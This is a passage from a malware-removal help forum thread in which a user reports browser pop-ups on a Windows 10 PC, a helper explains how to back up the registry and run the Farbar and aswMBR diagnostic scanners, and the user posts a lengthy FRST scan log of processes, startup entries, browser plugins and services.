Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: Malware or Spybot Issue

  1. #1
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post Malware or Spybot Issue

    Hi,
    I have a Intel Core i5-4670K at 3.40GHz
    16GB of ram
    Running Windows 10 Home edition (64 bit)
    Using Avast Antivirus
    Chrome Browser

    I am working from the infected computer, i am able to access some pages just fine like hotmail, Spybot website, youtube, but some of my other frequently visited sites all have numerous pop ups now.

    I have run a few full system scans using Spybot - Search and Destroy 2.5 and it has found 5 items with very low to marginal danger ratings. I have selected 'Fix Selected' and the green tick appears but the pop ups still seem to persist and after running more full system scans the same 5 problems come up again. I dont know if this information is redundent or too vague but the problem types are, registry change (2 of those), Browser: Cache, Registry Key, and Browser History. The Categories are Tracks (3 of those), and Browser (2 of those).

    I can attached screen shots and what ever else that is needed if it helps in diagnosing and solving the problem.

    Thanks for any and all help.
    --------------------------------
    Admin Edit

    FAQ: http://forums.spybot.info/showthread.php?t=288

  2. #2
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    Please back up your registry!

    Backup the Registry:
    Credit: Dakeyras

    Modifying the Registry can create unforeseen problems, so it always wise to create a backup before doing so.

    • Please download the installer for Registry Backup from here or here and save to your desktop.
    • Right-click on tweaking.com_registry_backup_setup.exe and select Run as Administrator >> Follow the prompts for a default installation
    • Ensure the option Open "Tweaking.com - Registry Backup" When Install Completes is selected >> Next > >> Finish
    • Once the GUI(graphical user interface) has appeared/loaded:-



    • Click on Backup Now >> once the process is complete the below will be displayed in the GUI:-



    • Close Tweaking.com - Registry Backup

    Note: There will now be a folder at the root of the Hard-Drive named C:\RegBackup, do not delete this as it is the actual backup just created.

    A tutorial for Registry Backup explaining the various features be viewed HERE


    ``````````````````````````````````````````````````````
    Instruction for producing the Farbar Recovery Scan Tool (FRST) and aswMBR logs

    Farbar Log

    Please download Farbar Recovery Scan Tool and save it to your desktop.

    Note:
    You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

    (A simple way to check your system: Start --> Computer (right click) --> Properties
    How to determine whether a computer is running a 32-bit version or 64-bit version of the Windows operating system

    • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
    • Please make sure All Users is checked


    • Do not check
      *List BCD
      *Drivers MD5
      *Shortcut txt

    Or your logs will be too long to post.


    • Press Scan button.
    • It will produce a log called FRST.txt in the same directory the tool is run from.
    • Please don't run the Farbar Recovery Scan Tool (FRST.txt) from your "Downloads" folder or from "Temporary Internet Files"
    • Please copy and paste log into your topic.
    • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please attach that along with the FRST.txt into your reply.



    aswMBR Log

    Important! Please do NOT perform any fix options offered in aswMBR, we just need to see the report.

    Please download aswMBR to your desktop.


    • Double click the aswMBR icon to run it.
    • If a prompt stating: The computer supports "Virtualization Technology" appears select Yes
    • Click the Scan button to start scan.
    • If you are asked to update the Avast Virus database please allow it to do so.
    • When it finishes, press the Save Log button, save the logfile to your desktop and post its contents in your reply with the Farbar (FRST) log.
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  3. #3
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Post Farbar Recovery Scan Tool and aswMBR logs

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
    Ran by Kym (administrator) on KYM-PC (29-02-2016 20:46:10)
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Platform: Windows 10 Home (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AMD) C:\WINDOWS\System32\atiesrxx.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
    (Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
    () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Angus Johnson) D:\Internode\mum.exe
    (Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
    (Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    (Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
    (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    (Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe
    (Microsoft Corporation) C:\WINDOWS\System32\dllhost.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
    HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
    HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
    HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
    HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
    ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64\FileSyncShell64.dll No File
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileSyncShell.dll No File
    Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
    ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\Parameters: [NameServer] 82.163.143.171 82.163.142.173
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 82.163.143.171 82.163.142.173
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    SearchScopes: HKLM -> DefaultScope value is missing
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> D:\Microsoft Office 2013\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2015-07-02] (Avast Software s.r.o.)
    BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2016-01-12] (Microsoft Corporation)
    BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll [2009-02-06] (Zeon Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-25] (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2015-07-02] (Avast Software s.r.o.)
    BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
    BHO-x32: No Name -> {c4e7ab80-82fd-49d4-801d-669cc0a2392a} -> No File
    BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-25] (Oracle Corporation)
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - D:\Microsoft Office 2013\Office15\MSOSB.DLL [2015-02-17] (Microsoft Corporation)
    Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
    Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
    Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

    FireFox:
    ========
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> D:\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [No File]
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [No File]
    FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-25] (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-18] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
    FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> D:\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-19] (Adobe Systems Inc.)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2015-11-18] (Microsoft Corporation)
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2015-12-10]

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com/
    CHR StartupUrls: Default -> "hxxp://www.youtube.com/feed/subscriptions","hxxp://imgur.com/","hxxps://www.netflix.com/","hxxp://twitch.tv/"
    CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\PepperFlash\pepflashplayer.dll ()
    CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
    CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
    CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
    CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
    CHR Profile: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
    CHR Extension: (Adblock Plus) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-02-26]
    CHR Extension: (Google Search) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-26]
    CHR Extension: (Gmail) - C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-28]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2015-07-02]
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdobeActiveFileMonitor11.0; D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe [171600 2012-09-17] (Adobe Systems Incorporated)
    R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2020056 2016-02-09] (Adobe Systems, Incorporated)
    R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-09-02] (Apple Inc.)
    S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-07] ()
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [343336 2015-07-02] (Avast Software s.r.o.)
    R3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4034896 2015-07-02] (Avast Software)
    S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [49152 2014-05-04] () [File not signed]
    R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
